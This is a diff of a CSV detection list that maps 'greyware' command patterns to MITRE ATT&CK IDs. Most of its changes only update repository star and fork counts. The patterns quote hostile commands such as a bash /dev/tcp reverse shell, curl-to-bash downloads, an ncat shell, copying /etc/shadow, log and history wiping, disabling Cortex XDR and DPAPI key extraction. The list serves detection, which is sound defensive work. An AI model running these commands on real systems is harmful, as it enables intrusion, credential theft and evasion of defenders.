 "*AteraAgent*AgentPackageRunCommandInteractive.exe*","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*attrib +s +h desktop.ini*","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
 "*b4ldr/nse-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
-"*bad client public DH value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"*bad client public DH value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
 "*Bad HTTP verb.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
 "*bash -c *curl *.sh | bash*","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*bash -c *wget *.sh | bash*","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
-"*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z"
+"*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z"
 "*bash -i >& /dev/tcp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
 "*bblcccknbdbplgmdjnnikffefhdlobhp*","greyware_tool_keyword","FastStunnel VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*bcdedit* /set {default} bootstatuspolicy ignoreallfailures*","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.","T1218.004 - T1562.001","TA0007 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -350,7 +350,7 @@
 "*bibjcjfmgapbfoljiojpipaooddpkpai*","greyware_tool_keyword","VPN-free.pro","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*bihhflimonbpcfagfadcnbbdngpopnjb*","greyware_tool_keyword","DEEPRISM VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*bihmplhobchoageeokmgbdihknkjbknd*","greyware_tool_keyword","Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
-"*binwalk*","greyware_tool_keyword","binwalk","Binwalk is a fast. easy to use tool for analyzing. reverse engineering. and extracting firmware images.","T1059.007 - T1060 - T1057 - T1142 - T1102.003","TA0002 - TA0005 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/ReFirmLabs/binwalk","1","0","greyware tool - risks of False positive !","N/A","10","9640","1442","2023-08-23T23:11:31Z","2013-11-15T20:45:40Z"
+"*binwalk*","greyware_tool_keyword","binwalk","Binwalk is a fast. easy to use tool for analyzing. reverse engineering. and extracting firmware images.","T1059.007 - T1060 - T1057 - T1142 - T1102.003","TA0002 - TA0005 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/ReFirmLabs/binwalk","1","0","greyware tool - risks of False positive !","N/A","10","9643","1442","2023-08-23T23:11:31Z","2013-11-15T20:45:40Z"
 "*bitsadmin /transfer debjob /download /priority normal \*\C$\Windows\*.dll","greyware_tool_keyword","bitsadmin","bitsadmin suspicious transfer","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*bkkgdjpomdnfemhhkalfkogckjdkcjkg*","greyware_tool_keyword","VPNMatic","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*bniikohfmajhdcffljgfeiklcbgffppl*","greyware_tool_keyword","Upnet","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
@@ -372,7 +372,7 @@
 "*cat *.zsh_history*","greyware_tool_keyword","cat","show zsh history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A"
 "*cat *.zsh_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*cat *bash-history*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
-"*cat /dev/null > *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
+"*cat /dev/null > *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
 "*cat /dev/null > /var/log/auth.log*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*cat /dev/null > ~/.bash_history*","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*cat /etc/passwd*","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -386,9 +386,9 @@
 "*chrome* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A"
 "*chrome.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A"
 "*ckiahbcmlmkpfiijecbpflfahoimklke*","greyware_tool_keyword","Gom VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
-"*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*","greyware_tool_keyword","powershell","Deletes contents of recycle bin","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*","greyware_tool_keyword","powershell","Deletes contents of recycle bin","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
 "*cmd* wevtutil.exe cl *","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
-"*cmd*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z"
+"*cmd*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z"
 "*cmd.exe /S /D /c* echo 123","greyware_tool_keyword","echo","Adversaries may attempt to test echo command after exploitation","T1059.001 - T1059.003","TA0002 - TA0006","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*cmd.exe /c chcp >&2*","greyware_tool_keyword","chcp","chcp displays the number of the active console code page","T1059 - T1027","TA0002 - TA0009","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*cmd.exe /c echo * > \\.\pipe\*","greyware_tool_keyword","echo","Named pipe impersonation","T1134.002 - T1055 - T1548.002","TA0004 - TA0003 - TA0002","N/A","N/A","Privilege Escalation","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","7","10","N/A","N/A","N/A","N/A"
@@ -407,12 +407,12 @@
 "*copy *system.hive \\*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*Copy New *gdrive://www.googleapis.com/GS_Sync/*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
 "*Copy New *sftp://*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
-"*Corrupted MAC on input*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"*Corrupted MAC on input*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
 "*Could not set file modification time.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
 "*couldn't handle sandbox event*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
 "*cp /etc/passwd*","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*cp /etc/shadow*","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
-"*cp -i /bin/sh */crond*","greyware_tool_keyword","crond","Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.","T1036 - T1564.003 - T1059.004","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z"
+"*cp -i /bin/sh */crond*","greyware_tool_keyword","crond","Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.","T1036 - T1564.003 - T1059.004","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z"
 "*crontab* sleep *ncat * -e /bin/bash*crontab*","greyware_tool_keyword","crontab","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","POST Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*curl https://api.hunter.io/v2/domain-search?domain=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
 "*curl https://api.hunter.io/v2/email-finder?domain=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A"
@@ -423,9 +423,9 @@
 "*cytool.exe runtime disable*","greyware_tool_keyword","cytool","Disables Cortex XDR (Even with tamper protection enabled)","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A"
 "*cytool.exe startup disable*","greyware_tool_keyword","cytool","Disables the cortex agent on startup","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A"
 "*dbdbnchagbkhknegmhgikkleoogjcfge*","greyware_tool_keyword","Hideman VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
-"*dd if=/dev/nul*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
-"*dd if=/dev/zero*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
-"*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*dd if=/dev/nul*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
+"*dd if=/dev/zero*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
+"*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "*debugfs /dev/*","greyware_tool_keyword","debugdfs","Linux SIEM Bypass with debugdfs shell","T1059 - T1053 - T1037","TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
 "*devtunnel create *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
 "*devtunnel host -p *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
@@ -441,15 +441,15 @@
 "*dl.wireshark.org*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*dnscmd . /enumrecords /zone *","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*dnscmd . /enumzones*","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
-"*donate.v2.xmrig.com:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*donate.v2.xmrig.com:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "*dpapi.py backupkeys -t */*@*","greyware_tool_keyword","dpapi.py","the command is used to extract the Data Protection API (DPAPI) backup keys from a target system. DPAPI is a Windows API that provides data protection services to secure sensitive data. such as private keys. passwords. and other secrets. By obtaining the DPAPI backup keys. an attacker can potentially decrypt sensitive data stored on the target system or impersonate users. gaining unauthorized access to other systems and resources.","T1552.006","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
